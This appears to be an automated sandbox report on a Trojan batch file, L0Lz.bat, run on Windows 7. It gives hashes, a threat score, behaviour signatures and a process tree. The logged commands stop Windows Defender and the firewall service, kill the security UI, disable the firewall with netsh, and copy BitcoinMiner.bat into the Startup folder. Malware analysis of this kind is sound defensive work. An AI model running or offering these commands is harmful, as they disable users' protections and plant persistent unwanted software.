Overview

overview

10

Static

static

10

The-MALWAR...ug.exe

windows7-x64

The-MALWAR...le.exe

windows7-x64

3

The-MALWAR...an.bat

windows7-x64

1

The-MALWAR...Lz.bat

windows7-x64

8

The-MALWAR...ou.exe

windows7-x64

1

The-MALWAR...MZ.exe

windows7-x64

7

The-MALWAR...st.exe

windows7-x64

8

The-MALWAR...er.exe

windows7-x64

8

The-MALWAR...RC.exe

windows7-x64

8

The-MALWAR...er.exe

windows7-x64

3

The-MALWAR....a.exe

windows7-x64

The-MALWAR...rk.exe

windows7-x64

9

The-MALWAR...an.exe

windows7-x64

The-MALWAR...98.exe

windows7-x64

1

The-MALWAR...aj.exe

windows7-x64

7

The-MALWAR...jB.exe

windows7-x64

7

The-MALWAR...om.exe

windows7-x64

6

The-MALWAR...1C.exe

windows7-x64

5

The-MALWAR...90.exe

windows7-x64

9

The-MALWAR...6a.exe

windows7-x64

9

The-MALWAR...it.exe

windows7-x64

1

The-MALWAR...m_.eml

windows7-x64

The-MALWAR...ng.exe

windows7-x64

7

The-MALWAR....a.exe

windows7-x64

10

The-MALWAR...1A.exe

windows7-x64

8

The-MALWAR...as.exe

windows7-x64

6

The-MALWAR...te.exe

windows7-x64

7

The-MALWAR....a.exe

windows7-x64

3

The-MALWAR...le.exe

windows7-x64

3

The-MALWAR...us.exe

windows7-x64

10

The-MALWAR...er.exe

windows7-x64

7

The-MALWAR...ff.exe

windows7-x64

3

Analysis

  • max time kernel
    1558s
  • max time network
    1565s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    13-12-2024 22:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    The-MALWARE-Repo-master/Trojan/L0Lz.bat

  • Size

    6KB

  • MD5

    74f8a282848b8a26ceafe1f438e358e0

  • SHA1

    007b350c49b71b47dfc8dff003980d5f8da32b3a

  • SHA256

    fc94130b45112bdf7fe64713eb807f4958cdcdb758c25605ad9318cd5a8e17ae

  • SHA512

    3f73c734432b7999116452e673d734aa3f5fe9005efa7285c76d28a98b4c5d2620e772f421e030401ad223abbb07c6d0e79b91aa97b7464cb21e3dc0b49c5a81

  • SSDEEP

    192:tlYUT1jLPD5mZkRr3TfLQ4/zus8joPRJRqU1jXEmo:tlY85XW

Score
8/10
discoveryevasionpersistenceprivilege_escalation

Malware Config

Signatures

  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Drops startup file 2 IoCs
  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Kills process with taskkill 1 IoCs
    evasion
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\The-MALWARE-Repo-master\Trojan\L0Lz.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2568
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
          PID:2352
      • C:\Windows\system32\net.exe
        net stop "SDRSVC"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:780
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC"
          3⤵
            PID:3032
        • C:\Windows\system32\net.exe
          net stop "WinDefend"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "WinDefend"
            3⤵
              PID:2488
          • C:\Windows\system32\taskkill.exe
            taskkill /f /t /im "MSASCui.exe"
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2288
          • C:\Windows\system32\net.exe
            net stop "security center"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2760
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "security center"
              3⤵
                PID:2748
            • C:\Windows\system32\net.exe
              net stop sharedaccess
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2440
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop sharedaccess
                3⤵
                  PID:2260
              • C:\Windows\system32\netsh.exe
                netsh firewall set opmode mode-disable
                2⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:2728
              • C:\Windows\system32\net.exe
                net stop "wuauserv"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2884
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "wuauserv"
                  3⤵
                    PID:2880
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo tasklist "
                  2⤵
                    PID:1644
                  • C:\Windows\system32\find.exe
                    find /I "L0Lz"
                    2⤵
                      PID:3040
                    • C:\Windows\system32\xcopy.exe
                      XCOPY "BitcoinMiner.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
                      2⤵
                      • Drops startup file
                      PID:2652
                    • C:\Windows\system32\xcopy.exe
                      XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                      2⤵
                        PID:2640
                      • C:\Windows\system32\xcopy.exe
                        XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                        2⤵
                          PID:2952
                        • C:\Windows\system32\xcopy.exe
                          XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                          2⤵
                            PID:2968
                          • C:\Windows\system32\xcopy.exe
                            XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                            2⤵
                              PID:304
                            • C:\Windows\system32\xcopy.exe
                              XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                              2⤵
                                PID:2676
                              • C:\Windows\system32\xcopy.exe
                                XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                2⤵
                                  PID:1864
                                • C:\Windows\system32\xcopy.exe
                                  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                  2⤵
                                    PID:1044
                                  • C:\Windows\system32\xcopy.exe
                                    XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                    2⤵
                                      PID:1612
                                    • C:\Windows\system32\xcopy.exe
                                      XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                      2⤵
                                        PID:1936
                                      • C:\Windows\system32\xcopy.exe
                                        XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                        2⤵
                                          PID:1648
                                        • C:\Windows\system32\xcopy.exe
                                          XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                          2⤵
                                            PID:2336
                                          • C:\Windows\system32\xcopy.exe
                                            XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                            2⤵
                                              PID:2072
                                            • C:\Windows\system32\xcopy.exe
                                              XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                              2⤵
                                                PID:2088
                                              • C:\Windows\system32\xcopy.exe
                                                XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                2⤵
                                                  PID:1924
                                                • C:\Windows\system32\xcopy.exe
                                                  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                  2⤵
                                                    PID:2024
                                                  • C:\Windows\system32\xcopy.exe
                                                    XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                    2⤵
                                                      PID:1788
                                                    • C:\Windows\system32\xcopy.exe
                                                      XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                      2⤵
                                                        PID:1548
                                                      • C:\Windows\system32\xcopy.exe
                                                        XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                        2⤵
                                                          PID:592
                                                        • C:\Windows\system32\xcopy.exe
                                                          XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                          2⤵
                                                            PID:1808
                                                          • C:\Windows\system32\xcopy.exe
                                                            XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                            2⤵
                                                              PID:2356
                                                            • C:\Windows\system32\xcopy.exe
                                                              XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                              2⤵
                                                                PID:564
                                                              • C:\Windows\system32\xcopy.exe
                                                                XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                                2⤵
                                                                  PID:2916
                                                                • C:\Windows\system32\xcopy.exe
                                                                  XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                                  2⤵
                                                                    PID:2256
                                                                  • C:\Windows\system32\xcopy.exe
                                                                    XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                                    2⤵
                                                                      PID:548
                                                                    • C:\Windows\system32\xcopy.exe
                                                                      XCOPY "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BitcoinMiner.bat"
                                                                      2⤵
                                                                        PID:2392

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Temp\The-MALWARE-Repo-master\Trojan\BitcoinMiner.bat
                                                                      Filesize

                                                                      300B

                                                                      MD5

                                                                      cb63bd942c87234d19663ff17d75cf52

                                                                      SHA1

                                                                      826aff7cc6ece64d7c5fc2d780ef887602c283b0

                                                                      SHA256

                                                                      e4a162e84753d3c8399dcad2a287d9ca496823c065c953be64ea6ce71bf435a8

                                                                      SHA512

                                                                      63c98807ade96132701e2794049ab99b43c3edbfc8cc9f20f03c433b3220b01876d70458cf11d84a239492409047840bace97860824e8160587e6ca8008a493a

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\The-MALWARE-Repo-master\Trojan\BitcoinMiner.bat
                                                                      Filesize

                                                                      300B

                                                                      MD5

                                                                      4aa09c46db228e7f610ad440cd89c103

                                                                      SHA1

                                                                      b23b62bbd22a602b113038a07217c6abcb156f06

                                                                      SHA256

                                                                      d13d4a8b3b8add19b5970157f09d00c12cbda4fed4d74d8493156523f7069b66

                                                                      SHA512

                                                                      72648deb391416ce55820d413f21fd2ecd18617c62955858059ed96815380e960c2bb005f7b792c82a9bb6022ebfe0c13af97c2be2c243a63a16267a2a8037da

                                                                      Download Submit